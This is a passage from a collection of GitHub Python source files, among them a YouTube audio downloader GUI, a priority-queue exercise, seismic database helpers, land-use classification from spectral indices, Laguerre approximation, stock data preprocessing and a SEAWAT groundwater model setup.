self.lineEdit.setObjectName(\"lineEdit\")\n self.pushButton = QtWidgets.QPushButton(Dialog)\n self.pushButton.setGeometry(QtCore.QRect(290, 140, 61, 31))\n self.pushButton.setStyleSheet(\"QPushButton {\\n\"\n\" image: url(:/img/Add_00000.png);\\n\"\n\" background-color: rgba(205, 205, 205, 0);\\n\"\n\" boder-radius: 5px;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" \\n\"\n\" image: url(:/img/AddHigh_00000.png);\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" image: url(:/img/Add_00000.png);\\n\"\n\"}\")\n self.pushButton.setText(\"\")\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Dialog)\n self.pushButton_2.setGeometry(QtCore.QRect(140, 210, 141, 71))\n self.pushButton_2.setStyleSheet(\"QPushButton {\\n\"\n\" \\n\"\n\" image: url(:/img/viewmusic_00000.png);\\n\"\n\" background-color: rgba(205, 205, 205, 0);\\n\"\n\" boder-radius: 5px;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" image: url(:/img/viewmusic2_00000.png);\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" image: url(:/img/viewmusic_00000.png);\\n\"\n\"}\")\n self.pushButton_2.setText(\"\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n self.pushButton.clicked.connect(self.add_music)\n self.pushButton_2.clicked.connect(self.view_music)\n\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.lineEdit.setPlaceholderText(_translate(\"Dialog\", \"enter the URL of the song \"))\n\n def view_music(self):\n path = './musics'\n path = os.path.realpath(path)\n os.startfile(path)\n\n def add_music(self):\n try:\n # Download for Youtube\n try:\n os.mkdir('./musics')\n except:\n pass\n url = self.lineEdit.text()\n stream = pt.YouTube(url = url).streams.get_audio_only()\n stream.download()\n title = str(stream.title)\n\n # Converter of mp4 to mp3\n clip = mp.AudioFileClip(title + '.mp4')\n clip.write_audiofile(f'musics/'+ title + '.mp3')\n\n # Remove mp4\n os.remove(title + '.mp4')\n except:\n error = QtWidgets.QMessageBox()\n error.setWindowTitle(\"Error\")\n error.setIcon(QtWidgets.QMessageBox.Critical)\n error.setText(\"Unable to download, error found\")\n error.exec()\n else:\n msg = QtWidgets.QMessageBox()\n msg.setWindowTitle(\"Done\")\n msg.setIcon(QtWidgets.QMessageBox.Information)\n msg.setText(\"Your music was successfully downloaded\")\n msg.exec()\n\n def retranslateUi(self, Dialog):\n Dialog.setWindowIcon(QtGui.QIcon('img/settings_00000'))\n \n \n\n\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n Dialog = QtWidgets.QDialog()\n ui = Ui_Dialog()\n ui.setupUi(Dialog)\n Dialog.show()\n app.exec_()","repo_name":"eumaninho54/MusicPlayer","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"20507478087","text":"#!/usr/bin/env python3\r\n\r\nfrom priority_queue_112 import PQ\r\nimport sys\r\nm = int(sys.argv[1])\r\n\r\ndef desc(t):\r\n return t[1]\r\n\r\ndef main():\r\n queue = PQ()\r\n # read first m elements into the queue\r\n i = 0\r\n while i < m:\r\n num = int(sys.stdin.readline().rstrip())\r\n queue.insert(num)\r\n\r\n i += 1\r\n\r\n # get the minimum M numbers from stdin\r\n for element in sys.stdin:\r\n element = int(element.rstrip())\r\n if element < queue.getMax():\r\n queue.insert(element)\r\n queue.delMax()\r\n\r\n while not(queue.is_empty()):\r\n # print(queue.d, queue.N)\r\n print(queue.delMax())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ClassicRevive/labwork","sub_path":"ca117/lab20/minelts_112.py","file_name":"minelts_112.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"72603076735","text":"from microquake.core.stream import Trace, Stream\nfrom microquake.core.settings import settings\nimport numpy as np\nfrom obspy.core import UTCDateTime\nfrom loguru import logger\nfrom microquake.db.models.alchemy import ContinuousData\nfrom microquake.db.connectors import connect_timescale\nfrom datetime import datetime\nfrom sqlalchemy import desc\nfrom pytz import utc\n\n\ndef get_continuous_data(start_time, end_time, sensor_id=None):\n\n db_lag = get_db_lag()\n logger.info(f'the database lag is {db_lag} seconds')\n\n if type(start_time) is datetime:\n start_time = UTCDateTime(start_time)\n\n if type(end_time) is datetime:\n end_time = UTCDateTime(end_time)\n\n session, engine = connect_timescale()\n inventory = settings.inventory\n\n e_time = end_time.datetime\n s_time = start_time.datetime\n\n network_code = inventory.networks[0].code\n\n t = ContinuousData.time\n et = ContinuousData.end_time\n sid = ContinuousData.sensor_id\n\n if sensor_id is None:\n logger.info('requesting data for all sensors')\n cds = session.query(ContinuousData).filter(t <= e_time,\n et > s_time)\n else:\n if inventory.select(sensor_id) is None:\n logger.error(f'the sensor {sensor_id} is not in the inventory')\n\n return\n logger.info(f'requesting data for sensor {sensor_id}')\n cds = session.query(ContinuousData).filter(t <= e_time,\n et > s_time,\n sid == sensor_id)\n\n traces = []\n for cd in cds:\n x = np.array(cd.x)\n y = np.array(cd.y)\n z = np.array(cd.z)\n tr_x = Trace(data=x)\n tr_x.stats.starttime = UTCDateTime(cd.time)\n tr_x.stats.sampling_rate = cd.sample_rate\n tr_x.stats.channel = 'X'\n tr_x.stats.station = str(cd.sensor_id)\n tr_x.stats.network = network_code\n traces.append(tr_x)\n tr_y = Trace(data=y)\n tr_y.stats.starttime = UTCDateTime(cd.time)\n tr_y.stats.sampling_rate = cd.sample_rate\n tr_y.stats.channel = 'Y'\n tr_y.stats.station = str(cd.sensor_id)\n tr_y.stats.network = network_code\n traces.append(tr_y)\n tr_z = Trace(data=z)\n tr_z.stats.starttime = UTCDateTime(cd.time)\n tr_z.stats.sampling_rate = cd.sample_rate\n tr_z.stats.channel = 'Z'\n tr_z.stats.station = str(cd.sensor_id)\n tr_z.stats.network = network_code\n traces.append(tr_z)\n\n time_now = UTCDateTime.now()\n delay = time_now - end_time\n\n st = Stream(traces=traces).trim(starttime=start_time, endtime=end_time)\n\n if st is None:\n logger.warning(f'no data recovered from the database! '\n f'the current database lag is {db_lag}')\n return None\n\n duration = (end_time - start_time)\n\n trs = []\n # st = st.merge(fill_value=np.nan)\n for i, tr in enumerate(st):\n expected_number_sample = tr.stats.sampling_rate * duration\n if np.all(tr.data == 0):\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'only zero. The trace will not be kept')\n continue\n elif np.any(np.isnan(tr.data)):\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'some NaN. The trace will not be kept')\n continue\n elif len(tr) < 0.9 * expected_number_sample:\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'too little data. The trace will not be kepy')\n continue\n\n trs.append(tr)\n\n if not trs:\n return None\n\n st = Stream(traces=trs).trim(starttime=start_time,\n endtime=end_time)\n\n session.close()\n engine.dispose()\n\n return st.detrend('demean')\n\n\ndef get_db_lag(percentile=75):\n \"\"\"\n returns lag in seconds\n :param percentile: percentile of data to use to determine the delay.\n For instance, if percentile = 75, 75 percent of the trace will have a lag\n of less than the returned value.\n :return: lag in second\n \"\"\"\n\n session, engine = connect_timescale()\n\n inventory = settings.inventory\n t = ContinuousData.time\n sensor_id = ContinuousData.sensor_id\n\n times = []\n for sensor in inventory.stations():\n\n records = session.query(t, sensor_id).filter(\n sensor_id == sensor.code).order_by(desc(t)).limit(1)\n\n for record in records:\n times.append(record.time.timestamp())\n\n if not times:\n return None\n\n time = datetime.utcfromtimestamp(np.percentile(times, percentile))\n\n lag = datetime.utcnow().replace(tzinfo=utc) - time.replace(tzinfo=utc)\n\n session.close()\n engine.dispose()\n\n return lag.total_seconds()\n\n\n","repo_name":"jeanphilippemercier/microquake","sub_path":"microquake/core/helpers/timescale_db.py","file_name":"timescale_db.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"10638349506","text":"#!/usr/bin/ennv python\n\nimport json\n\n\nwith open('../data/categories.json', 'r') as f:\n categories = json.load(f)\n\ntop_level_categories = [c for c in categories\n if (c['parents'] == []) and ('US' in c.get('country_whitelist', ['US']))]\n","repo_name":"philpot/yelp91030","sub_path":"src/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2151501726","text":"#load model\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport model as m\n\n#load model\nmodel = tf. keras.models.load_model('saved_model/TGA_model')\n\n# Check its architecture\nmodel.summary()\n\n\n# make predictions\ndef inputPrediction(inputText):\n\n # import tokenizer from previous model.py\n _, tokenizer = m.Tokenization()\n pred = ''\n confidence = 0.0\n inputList = [inputText]\n for i in range(0, len(inputList)):\n max_length = 100\n trunc_type = 'post'\n sequence = tokenizer.texts_to_sequences(inputList)\n padded = pad_sequences(sequence, maxlen = max_length, truncating = trunc_type)\n output = model.predict(padded)\n if (output[i][0] <= 0.5):\n print(output[i])\n pred = 'negative'\n confidence += output[i][0] \n else:\n print(output[i])\n pred = 'positive'\n confidence += output[i][0]\n\n print('Review: ' + inputList[i] + '\\n' + 'Sentiment: ' + pred + ' ' + str(output[i][0]) + '\\n' + '\\n')\n return pred, confidence \n\nsample = \"happy good wonderful\"\n\ninputPrediction(sample)","repo_name":"mshah016/app","sub_path":"appTEST/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"10271301860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 21:29:47 2018\n\n@author: Chinmay\n\"\"\"\n\nimport numpy as np\nimport gdal, copy\nfrom gdalconst import * \nimport matplotlib.pyplot as plt\n\n# input path\ninputpath = 'D:/Chinmay/Pune/Analysis_06_06_2018/NITK_RSGIS_20180824_154257/Outputs/LT05_L1TP_147047_19900318_20170131_01_T1.tar/LT5[147_047](1990-03-18_04-48)'\n\n\n# read spectral indices into numpy arrays\nndvidata = gdal.Open(inputpath+'NDVI.TIF', GA_ReadOnly)\nNDVI = np.array(ndvidata.GetRasterBand(1).ReadAsArray())\nndwidata = gdal.Open(inputpath+'NDWI.TIF', GA_ReadOnly)\nNDWI = np.array(ndwidata.GetRasterBand(1).ReadAsArray())\nndbidata = gdal.Open(inputpath+'NDBI_01.TIF', GA_ReadOnly)\nNDBI = np.array(ndbidata.GetRasterBand(1).ReadAsArray())\nndbaidata = gdal.Open(inputpath+'NDBaI_01.TIF', GA_ReadOnly)\nNDBAI = np.array(ndbaidata.GetRasterBand(1).ReadAsArray())\nmndwidata = gdal.Open(inputpath+'MNDWI_01.TIF', GA_ReadOnly)\nMNDWI = np.array(mndwidata.GetRasterBand(1).ReadAsArray())\n\n\n# create dictionary of thhresholds to be used for each spectral index to be classified \\\n#into a thematic raster class\n\nthresholds = {\"Wat_MNDWI\": 0.3,\n \"Veg_NDVI\" : 0.3,\n \"Veg_NDWI1\": 0.0,\n \"Veg_NDWI2\": 0.3,\n \"Veg_NDBI1\" : -0.02,\n \"Veg_NDBI2\" : -0.2,\n \"Veg_NDBaI1\": -0.3,\n \"Veg_NDBaI2\": -0.6,\n \"Sed_NDBaI1\": -0.6,\n \"Sed_NDBaI2\": 0.75,\n \"Built_NDVI\": 0.02,\n \"Built_NDWI\": 0.2,\n \"Built_NDBI\": 0.15,\n \"Built_NDBaI\": -0.25,\n \"Fallow_NDVI\": 0.2,\n \"Fallow_NDWI1\": -0.1,\n \"Fallow_NDWI2\": -0.25,\n \"Fallow_NDBI1\": 0.1,\n \"Fallow_NDBI2\": 0.3,\n \"Fallow_NDBaI\": -0.3\n }\n\n \n\ndef lulc_classify(NDVI, NDBI, NDBAI, NDWI, MNDWI):\n \"\"\"\n \n \"\"\"\n #create empty raster of same size as others\n Classified_raster = np.zeros(NDVI.shape)\n #Water\n #Classified_raster[np.where(MNDWI>=thresholds[\"Wat_MNDWI\"])] = 1\n \n \n # Sediment/river bed\n Classified_raster[np.where(np.logical_and(NDBAI>= thresholds[\"Sed_NDBaI2\"], \\\n NDBAI <= thresholds[\"Sed_NDBaI1\"]))] = 2 \n \n #Builtup area\n Classified_raster[np.where(np.logical_and(NDVI < thresholds[\"Built_NDVI\"] , \\\n NDWI < thresholds[\"Built_NDWI\"]) & \\\n np.logical_and(NDBI>=thresholds[\"Built_NDBI\"], NDBAI < thresholds[\"Built_NDBaI\"]))]=3\n \n return Classified_raster\n\n \n# # Vegetation\n# \n# Classified_raster[np.where(np.logical_and(NDWI>thresholds[\"Veg_NDWI1\"], NDWI < thresholds[\"Veg_NDWI2\"]) & \\\n# NDVI> thresholds[\"Veg_NDVI\"] & \\\n# (np.logical_and(NDBI > [\"Veg_NDBI2\"], NDBI < [\"Veg_NDBI1\"])) & \\\n# (np.logical_and(NDBAI > [\"Veg_NDBaI2\"], NDBI < [\"Veg_NDBaI1\"])))] = 3\n\n\n Classified_raster[np.where(NDVI < thresholds[\"Built_NDVI\"] & \\\n NDWI < thresholds[\"Built_NDWI\"] & \\\n NDBI >= thresholds[\"Built_NDBI\"] & \\\n NDBAI < thresholds[\"Built_NDBaI\"])] = 4\n \n# #Fallow land\n Classified_raster[np.where(np.logical_and(NDBI>thresholds[\"Fallow_NDBI1\"], NDBI <= thresholds[\"Fallow_NDBI2\"]) &\\\n NDVI < thresholds[\"Fallow_NDVI\"] & \\\n np.logical_and(NDWI >= thresholds[\"Fallow_NDWI2\"], NDWI < thresholds[\"Fallow_NDBI1\"]) & \\\n NDBAI < thresholds[\"Fallow_NDBaI\"])] = 5 \n# \n \n \n \n return Classified_raster\n\n\n ","repo_name":"devalc/Dtree_Lulc","sub_path":"classify_spectral_indices_into_lulc.py","file_name":"classify_spectral_indices_into_lulc.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13452920805","text":"from core.item import ItemEnum\n\n\nclass Room:\n \"\"\"\n A class representing a room in the map.\n\n Args:\n name (str): The name of the room.\n description (str): The description of the room.\n \"\"\"\n\n def __init__(self, name: str, description: str):\n self.name = name\n self.description = description\n\n\nclass Map:\n \"\"\"\n A class representing the game map.\n \"\"\"\n\n map = {\n \"Starting Room\": {\n \"north\": \"North Hallway\",\n \"south\": None,\n \"east\": None,\n \"west\": None,\n },\n \"North Hallway\": {\n \"north\": None,\n \"south\": \"Starting Room\",\n \"east\": \"North East Wing\",\n \"west\": \"North West Wing\",\n },\n \"North West Wing\": {\n \"north\": None,\n \"south\": None,\n \"east\": \"North Hallway\",\n \"west\": None,\n },\n \"North East Wing\": {\n \"north\": None,\n \"south\": \"Hidden Room\",\n \"east\": None,\n \"west\": \"North Hallway\",\n },\n \"Hidden Room\": {\n \"north\": \"North East Wing\",\n \"south\": None,\n \"east\": None,\n \"west\": None,\n },\n }\n\n danger_levels = {\n \"Starting Room\": 0, # No danger\n \"North Hallway\": 0, # No danger\n \"North West Wing\": 20, # Moderate danger\n \"North East Wing\": 50, # High danger\n \"Hidden Room\": 80, # Singnificantly High danger\n }\n\n room_danger_message = {\n \"Starting Room\": \"There is no danger here.\",\n \"North Hallway\": \"There is no danger here.\",\n \"North West Wing\": \"\\nThere is poisonous gas here, and you inhaled it. Now your health is significantly reduced.\", # Moderate danger\n \"North East Wing\": \"\\nA zombie appeared out of nowhere! He's attacking you, do something!\", # High danger\n \"Hidden Room\": \"\\nA witch is here! She cast a spell on you, which is making your skin burn!!\", # Singnificantly High danger\n }\n\n room_enemy = {\n \"Starting Room\": None,\n \"North Hallway\": None,\n \"North West Wing\": \"Poisonous gas\",\n \"North East Wing\": \"Zombie\",\n \"Hidden Room\": \"Witch\",\n }\n\n items = {\n \"North Hallway\": {\"Medicine\": ItemEnum.MEDICINE},\n \"North West Wing\": {\"Sword\": ItemEnum.SWORD},\n \"North East Wing\": {\"Wand\": ItemEnum.WAND},\n \"Hidden Room\": {\"Key\": ItemEnum.KEY},\n }\n\n load_room = {\n \"Starting Room\": Room(\n \"Starting Room\", \"You find yourself in a dimly lit room.\"\n ),\n \"North Hallway\": Room(\n \"North Hallway\",\n \"You are in a long hallway with doors to the west and east.\",\n ),\n \"North East Wing\": Room(\n \"North East Wing\", \"You sense something mysterious in this room.\"\n ),\n \"Hidden Room\": Room(\n \"Hidden Room\", \"Congratulations! You found the hidden treasure room!\"\n ),\n \"North West Wing\": Room(\n \"North West Wing\", \"This room seems to be abandoned and dusty.\"\n ),\n }\n","repo_name":"akshitverma4/Mystic-Maze","sub_path":"core/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20561262020","text":"import pandas as pd\nfrom sklearn import preprocessing\nimport numpy as np\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning)\nhistory_points = 50\nfrom db import Db\nimport sys\n\n\ndef get_raw_data(symbol,print_sample=True):\n \n model = Db()\n records = model.get_data(symbol)\n \n data = pd.DataFrame(data = records, \n columns = ['open_val','high_val','low_val','close_val','volume'])\n data = data.drop(0, axis=0)\n if print_sample:\n print(data.head(5))\n print(data.count())\n return data.to_numpy()\n\n\ndef create_dataset(symbol):\n data = get_raw_data(symbol)\n data_normaliser = preprocessing.MinMaxScaler()\n data_normalised = data_normaliser.fit_transform(data)\n ohlcv_histories_normalised = get_ohlcv_histories_normalised(data_normalised)\n\n next_day_open_values_normalised = np.array(\n [data_normalised[:, 0][i + history_points].copy() for i in range(len(data_normalised) - history_points)])\n next_day_open_values_normalised = np.expand_dims(next_day_open_values_normalised, -1)\n\n next_day_open_values = get_next_day_open_values(data)\n\n y_normaliser = get_y_normaliser(next_day_open_values)\n\n technical_indicators_normalised = get_technical_indicators(ohlcv_histories_normalised)\n\n assert ohlcv_histories_normalised.shape[0] == next_day_open_values_normalised.shape[0] == \\\n technical_indicators_normalised.shape[0]\n return ohlcv_histories_normalised, technical_indicators_normalised, next_day_open_values_normalised, \\\n next_day_open_values, y_normaliser\n\ndef get_y_normaliser(data):\n y_normaliser = preprocessing.MinMaxScaler()\n y_normaliser.fit(data)\n return y_normaliser\n\ndef get_next_day_open_values(data):\n next_day_open_values = np.array([data[:, 0][i + history_points].copy() for i in range(len(data) - history_points)])\n next_day_open_values = np.expand_dims(next_day_open_values, -1)\n return next_day_open_values\n\ndef get_ohlcv_histories_normalised(data_normalised, last=0):\n # using the last {history_points} open close high low volume data points, predict the next open value\n if (last == 0):\n rng = range(len(data_normalised) - history_points)\n else:\n rng = range(len(data_normalised) - history_points + 1 - last, len(data_normalised) - history_points + 2)\n return np.array(\n [data_normalised[i:i + history_points].copy() for i in rng])\n\ndef get_next_day_open_values_normalised(data_normalised, last=0):\n # using the last {history_points} open close high low volume data points, predict the next open value\n if (last == 0):\n rng = range(len(data_normalised) - history_points)\n else:\n rng = range(len(data_normalised) - history_points + 1 - last, len(data_normalised) - history_points + 2)\n return np.array(\n [data_normalised[i:i + history_points].copy() for i in rng])\n\n\ndef get_technical_indicators(ohlcv_histories_normalised):\n technical_indicators = []\n for his in ohlcv_histories_normalised:\n # note since we are using his[3] we are taking the SMA of the closing price\n sma = np.mean(his[:, 3])\n macd = calc_ema(his, 12) - calc_ema(his, 26)\n technical_indicators.append(np.array([sma]))\n # technical_indicators.append(np.array([sma,macd,]))\n\n technical_indicators = np.array(technical_indicators)\n\n tech_ind_scaler = preprocessing.MinMaxScaler()\n return tech_ind_scaler.fit_transform(technical_indicators)\n\n\ndef calc_ema(values, time_period):\n sma = np.mean(values[:, 3])\n ema_values = [sma]\n k = 2 / (1 + time_period)\n for i in range(len(values) - time_period, len(values)):\n close = values[i][3]\n ema_values.append(close * k + ema_values[-1] * (1 - k))\n return ema_values[-1]\n\"\"\"\n\ndef multiple_csv_to_dataset(test_set_name):\n import os\n ohlcv_histories = 0\n technical_indicators = 0\n next_day_open_values = 0\n for csv_file_path in list(filter(lambda x: x.endswith('daily.csv'), os.listdir('./'))):\n if not csv_file_path == test_set_name:\n print(csv_file_path)\n if type(ohlcv_histories) == int:\n ohlcv_histories, technical_indicators, next_day_open_values, _, _ = csv_to_dataset(csv_file_path)\n else:\n a, b, c, _, _ = csv_to_dataset(csv_file_path)\n ohlcv_histories = np.concatenate((ohlcv_histories, a), 0)\n technical_indicators = np.concatenate((technical_indicators, b), 0)\n next_day_open_values = np.concatenate((next_day_open_values, c), 0)\n\n ohlcv_train = ohlcv_histories\n tech_ind_train = technical_indicators\n y_train = next_day_open_values\n\n ohlcv_test, tech_ind_test, y_test, unscaled_y_test, y_normaliser = csv_to_dataset(test_set_name)\n\n return ohlcv_train, tech_ind_train, y_train, ohlcv_test, tech_ind_test, y_test, unscaled_y_test, y_normaliser\n\"\"\"","repo_name":"shlomitub28/cod-stock-demo","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"73487787456","text":"import numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\ndef moving_avg(df, n, step):\n \"\"\"\n moving avg with step size\n (Did not use pandas.rolling since step size not supported.)\n Input:\n df: Input dataframe. First column (index 0) is time stamp.\n n: window length\n step: step size of the moving average\n Return:\n data: 2D array with features, has less number of rows than input df. \n \"\"\"\n T = df.shape[0]\n new_t = range(0, T, step)\n data = np.zeros((len(new_t), df.shape[1]))\n\n for i, t in enumerate(new_t):\n data[i, :] = np.nanmean(df.iloc[t: t + n, :].values, axis=0) # ignore nan when computing mean.\n # discard the last window\n return data[:-1, :]\n\ndef moving_vote_majority(label_df, n, step):\n \"\"\"\n Take majority vote of labels in the moving window.\n Input:\n label_df: dataframe with one column denoting the label stream.\n n: window size.\n step: step size of the moving window\n Return:\n labels: 1D array with labels.\n \"\"\"\n T = label_df.shape[0]\n new_t = range(0, T, step)\n labels = np.zeros((len(new_t)))\n for i, t in enumerate(new_t):\n labels[i] = stats.mode(label_df.iloc[t: t + n].values)[0][0]\n return labels[:-1]\n\ndef fill_missing(training, test, col_threshold, replace):\n \"\"\"\n training: 2D array\n test: 2D array or None. If test is None, only process training data.\n col_threshold: if nan values in one column is greater than col_threshold, the column is ignored.\n replace: True: replace nan value in each row. False: delete the row if it contains nan.\n \"\"\"\n # delete nan columns\n training = training[:, np.sum(np.isnan(training), axis=0) < col_threshold * training.shape[0]]\n if test is not None:\n test = test[:, np.sum(np.isnan(test), axis=0) < col_threshold * test.shape[0]]\n\n # process nans in each row\n if not replace:\n training = training[np.logical_not(np.any(np.isnan(training), axis=1)), :]\n if test is not None:\n test = test[np.logical_not(np.any(np.isnan(test), axis=1)), :]\n else:\n # replace with previous values\n for i in range(0, training.shape[0]):\n if i == 0:\n training[i, np.isnan(training[i, :])] = 0.0\n else:\n training[i, np.isnan(training[i, :])] = training[i - 1, np.isnan(training[i, :])]\n # remove the column with zero variance\n var_train = np.var(training, axis=0)\n logical_mask = var_train > 0\n training = training[:, logical_mask]\n \n if test is not None:\n test = test[:, logical_mask]\n mean_train = np.mean(training, axis=0)\n for i in range(0, test.shape[0]):\n if i == 0:\n # fill in the mean of training data\n test[i, np.isnan(test[i, :])] = mean_train[np.isnan(test[i, :])]\n else:\n test[i, np.isnan(test[i, :])] = test[i - 1, np.isnan(test[i, :])]\n \n return training, test\n\ndef extract_feature_per_person(person):\n \"\"\"\n For each person in the dataset, smooth data, fill missing values and perform dimension reduction.\n Use ADL1~3 for training, ADL4~5 for testing.\n Return:\n train_reduced: [n_train, n_features]. Sequence of training feature vectors.\n test_reduced: [n_test, n_features]. Sequence of testing feature vectors.\n train_labels: [n_train, ]. Sequence of training activity labels in {0, 101, 102, 103, 104, 105}\n test_labels: [n_test, ]. Sequence of testing activity labels in {0, 101, 102, 103, 104, 105}\n train_len: length of subsequences in training data. sum(train_len) = n_train.\n test_len: length of subsequences in testing data. sum(test_len) = n_test.\n \"\"\"\n # Load data\n sadl_n = []\n for n in range(1, 6):\n sadl_n.append(pd.read_table('data/S%d-ADL%d.dat' % (person, n), sep='\\s+', header=None, dtype=float))\n\n # Smooth data, time: col 0, features: col 1~36, labels: col 244 \n winsize = 15\n stepsize = 8\n # train data\n train_sample = np.empty((0, 36))\n train_labels = np.empty((0))\n train_len = []\n for i in range(0, 3):\n features = moving_avg(sadl_n[i].iloc[:, 1:37], winsize, stepsize)\n labels = moving_vote_majority(sadl_n[i].iloc[:, 244], winsize, stepsize)\n train_sample = np.concatenate((train_sample, features), axis=0)\n train_len.append(features.shape[0])\n train_labels = np.concatenate( (train_labels, labels) )\n train_len = np.array(train_len)\n # test data\n test_sample = np.empty((0, 36))\n test_labels = np.empty((0))\n test_len = []\n for i in range(3, 5):\n features = moving_avg(sadl_n[i].iloc[:, 1:37], winsize, stepsize)\n labels = moving_vote_majority(sadl_n[i].iloc[:, 244], winsize, stepsize)\n test_sample = np.concatenate((test_sample, features), axis=0)\n test_len.append(features.shape[0])\n test_labels = np.concatenate( (test_labels, labels) )\n test_len = np.array(test_len)\n\n # Fill missing values\n col_threshold = 0.5\n train, test = fill_missing(train_sample, test_sample, col_threshold, True)\n\n # Normalize features\n scalar = StandardScaler() # center to mean and normalize to unit variance\n train_normalized = scalar.fit_transform(train)\n test_normalized = scalar.fit_transform(test)\n\n # Dimension reduction\n pca = PCA()\n pca.fit(train_normalized)\n var_thres = 0.95 # keep components to up to 95% total variance\n n_comp = (pca.explained_variance_ratio_.cumsum() < var_thres).sum() + 1\n\n pca_train = PCA(n_components=n_comp)\n train_reduced = pca_train.fit_transform(train_normalized)\n test_reduced = pca_train.transform(test_normalized)\n\n return train_reduced, test_reduced, train_labels, test_labels, train_len, test_len\n \n","repo_name":"flian2/human-activity-recognition-hmm","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"}
+{"seq_id":"15105360905","text":"from choice import *\r\nfrom graphs import graph\r\nfrom algorithms import *\r\n\r\nif __name__ == '__main__':\r\n workflow = workflow()\r\n f = fun()\r\n d, e = int, float\r\n if workflow == 1:\r\n d = polynomial_degree()\r\n else:\r\n e = approximation_error()\r\n n = nodes_number()\r\n start, end = interval()\r\n coefficient = []\r\n weights, roots = laguerre(n)\r\n\r\n if workflow == 1:\r\n for i in range(0, d + 1):\r\n coefficient.append(lam(f, n, i, weights, roots))\r\n print(\"Blad aproksymacji wynosi: \" + str(error(roots, weights, f, coefficient, n, d)))\r\n\r\n else:\r\n d = 1\r\n while True:\r\n coefficient = []\r\n for i in range(0, d + 1):\r\n coefficient.append(lam(f, n, i, weights, roots))\r\n if error(roots, weights, f, coefficient, n, d) <= e:\r\n print(f\"Oczekiwany blad udalo sie uzyskac dla wielomiana stopnia: {d}\")\r\n break\r\n else:\r\n d += 1\r\n\r\n calculated_x, calculated_y, real_x, real_y = [], [], [], []\r\n h = (end - start) / 100\r\n while start <= end:\r\n result = 0.0\r\n for j in range(0, d + 1):\r\n result += coefficient[j] * laguerre_polynomial(j, start)\r\n calculated_x.append(start)\r\n calculated_y.append(result)\r\n real_x.append(start)\r\n real_y.append(f(start))\r\n start += h\r\n\r\n graph(calculated_x, calculated_y, real_x, real_y)\r\n","repo_name":"stepniaczky/NumericalMethods","sub_path":"laguerre_polynomials_approximation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20228097454","text":"import numpy as np\nimport flopy\nimport numpy as np\nimport flopy.utils.binaryfile as bf\nimport matplotlib.pyplot as plt\n\n\nLx = 2.0\nLz = 1.0\nnlay = 50\nnrow = 1\nncol = 100\ndelr = Lx / ncol\ndelc = 1.0\ndelv = Lz / nlay\nhenry_top = 1.0\nhenry_botm = np.linspace(henry_top - delv, 0.0, nlay)\nqinflow = 5.702 # m3/day\ndmcoef = 0.57024 # m2/day Could also try 1.62925 as another case of the Henry problem\nhk = 864.0 # m/day\n\nmodelname = \"henry\"\nswt = flopy.seawat.Seawat(modelname, exe_name=r\"C:\\Users\\ccl124\\bin\\swt_v4x64.exe\")\nprint(swt.namefile)\n\nipakcb = 53\n\ndis = flopy.modflow.ModflowDis(\n swt,\n nlay,\n nrow,\n ncol,\n nper=1,\n delr=delr,\n delc=delc,\n laycbd=0,\n top=henry_top,\n botm=henry_botm,\n perlen=1.5,\n nstp=15,\n)\n\n# Variables for the BAS package\nibound = np.ones((nlay, nrow, ncol), dtype=np.int32)\nibound[:, :, -1] = -1\n\nbas = flopy.modflow.ModflowBas(swt, ibound, 0)\n\nlpf = flopy.modflow.ModflowLpf(swt, hk=hk, vka=hk, ipakcb=ipakcb)\n\npcg = flopy.modflow.ModflowPcg(swt, hclose=1.0e-8)\n\noc = flopy.modflow.ModflowOc(\n swt,\n stress_period_data={(0, 0): 